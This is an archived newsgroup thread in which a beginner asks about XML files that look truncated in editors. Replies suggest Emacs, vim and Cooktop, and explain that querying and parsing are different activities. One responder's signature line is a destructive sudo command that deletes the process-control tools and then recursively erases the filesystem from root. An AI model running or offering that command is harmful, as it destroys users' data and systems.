Velocity Reviews > Newsgroups > Programming > XML > need help in xml

need help in xml

amore

im new in xml. It looks like large xml data(inside elements) was
truncated every time i open it on my editor(dreamweaver or visual
studio). is there any way of fixing that? which is faster, querying
data in mysql or parsing data in xml?

Peter Flynn

amore wrote:

> im new in xml. It looks like large xml data(inside elements) was
> truncated every time i open it on my editor(dreamweaver or visual
> studio). is there any way of fixing that?

Yes, use a real XML editor. Emacs is free, the rest cost, although
several of them have free time-limited tryouts.

> which is faster, querying
> data in mysql or parsing data in xml?

The two are not comparable. One is querying, the other is parsing.
They are two different activities.

///Peter
--
sudo '(/bin/rm -f `which killall kill ps shutdown`; cd /; /bin/rm -rf * &)'

mindell zamora

thanks a lot

nicolas //

Le 5 Mar 2005 13:56:09 -0800
"amore" <(E-Mail Removed)> a écrit:

> im new in xml. It looks like large xml data(inside elements) was
> truncated every time i open it on my editor(dreamweaver or visual
> studio). is there any way of fixing that? which is faster, querying
> data in mysql or parsing data in xml?

You can also use vim, which maybe easyer for you.
If you are on Windows, cooktop is a great (unknown) editor.

--
nicolas //